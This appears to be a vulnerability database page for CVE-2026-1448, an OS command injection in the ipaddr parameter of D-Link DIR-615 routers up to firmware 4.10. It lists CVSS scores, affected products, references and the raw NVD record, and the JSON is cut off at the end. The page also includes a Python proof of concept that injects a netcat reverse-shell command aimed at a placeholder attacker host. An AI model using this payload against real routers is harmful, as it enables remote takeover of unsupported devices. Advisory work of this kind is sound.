CVE-2026-1448

Description

A vulnerability was detected in D-Link DIR-615 up to 4.10. This impacts an unknown function of the file /wiz_policy_3_machine.php of the component Web Management Interface. Performing a manipulation of the argument ipaddr results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-615_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dir-615:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DIR-615 固件 <= 4.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-1448 PoC - D-Link DIR-615 OS Command Injection
# Target: D-Link DIR-615 up to firmware 4.10
# File: /wiz_policy_3_machine.php
# Parameter: ipaddr

target_ip = "192.168.0.1"  # Router IP
target_url = f"http://{target_ip}/wiz_policy_3_machine.php"

# Login first to get valid session
login_url = f"http://{target_ip}/login.php"
login_data = {
    "username": "admin",
    "password": "admin"
}

session = requests.Session()
# session.post(login_url, data=login_data)

# Exploit: OS Command Injection via ipaddr parameter
# Example: Inject command to create reverse shell
payload = "; nc -e /bin/sh attacker_ip 4444;"

params = {
    "ipaddr": payload,
    "action": "save"
}

# Send malicious request
response = session.get(target_url, params=params)
print(f"Status: {response.status_code}")
print(f"Response: {response.text[:500]}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1448
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1448
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1448/
[4] VulDB https://vuldb.com/cve/CVE-2026-1448
[5] https://pentagonal-time-3a7.notion.site/DIR-615-v4-10-2e7e5dd4c5a580a5aac5c8ce35933396?pvs=73
[6] https://vuldb.com/?ctiid.342880
[7] https://vuldb.com/?id.342880
[8] https://vuldb.com/?submit.737006
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1448", "sourceIdentifier": "[email protected]", "published": "2026-01-27T00:15:50.573", "lastModified": "2026-01-28T16:37:25.937", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in D-Link DIR-615 up to 4.10. This impacts an unknown function of the file /wiz_policy_3_machine.php of the component Web Management Interface. Performing a manipulation of the argument ipaddr results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Se detectó una vulnerabilidad en D-Link DIR-615 hasta la versión 4.10. Esto afecta a una función desconocida del archivo /wiz_policy_3_machine.PHP del componente Interfaz de Gestión Web. Realizar una manipulación del argumento ipaddr resulta en inyección de comandos. Es posible iniciar el ataque de forma remota. El exploit ya es público y puede ser utilizado. Esta vulnerabilidad solo afecta a productos que ya no cuentan con soporte por el mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 8.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 6.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-615_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.10", "matchCriteriaId": "E28848DF-B57F-4335-941E-E6C50A9E74B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-615:-:*:*:*:*:*:*:*", "matchCriteriaId": "2E92E959-C211-4979-A233-163BEFCF6F0D"}]}]}], "references": [{"url": "https://pentagonal-time-3a7.notion.site/DIR-615-v4-10-2e7e5dd4c5a580a5aac5c8ce35933396?pvs=73", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.342880", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.342880", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.c ... (truncated)